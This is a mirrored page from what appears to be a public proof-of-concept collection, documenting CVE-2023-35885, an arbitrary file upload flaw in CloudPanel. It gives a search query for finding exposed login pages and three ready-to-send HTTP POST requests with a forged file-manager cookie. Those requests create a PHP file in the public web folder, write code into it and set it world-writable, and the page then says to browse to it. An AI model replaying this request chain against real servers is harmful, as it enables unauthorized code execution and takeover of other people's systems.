admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/CloudPanel makefile 任意文件上传漏洞 CVE-2023-35885.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

75 lines
2.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# CloudPanel makefile 任意文件上传漏洞 CVE-2023-35885
## 漏洞描述
CloudPanel是一个免费的基于PHP的高性能服务器控制面板具有轻量级组件和现代功能易于使用且支持多个PHP版本提供多语言版本切换。
CloudPanel makefile 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
## 漏洞影响
cloudpanel 2.0.0 >= 2.3.0
## 网络测绘
```
title=="CloudPanel | Log In"
```
## 漏洞复现
登陆页面
![image-20231115102840968](images/image-20231115102840968.png)
poc
```
POST /file-manager/backend/makefile HTTP/1.1
Host:
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
id=/htdocs/app/files/public/&name=Test.php
```
![image-20231115103123744](images/image-20231115103123744.png)
```
POST /file-manager/backend/text HTTP/1.1
Host:
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 289
Content-Type: application/x-www-form-urlencoded
id=/htdocs/app/files/public/Test.php&content=<?php phpinfo()?>
```
![image-20231115103133858](images/image-20231115103133858.png)
```
POST /file-manager/backend/permissions HTTP/1.1
Host:
Accept: */*
Connection: keep-alive
Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
id=/htdocs/app/files/public/Test.php&permissions=0777
```
![image-20231115103158786](images/image-20231115103158786.png)
访问
```
/Test.php
```
Reference in New Issue View Git Blame Copy Permalink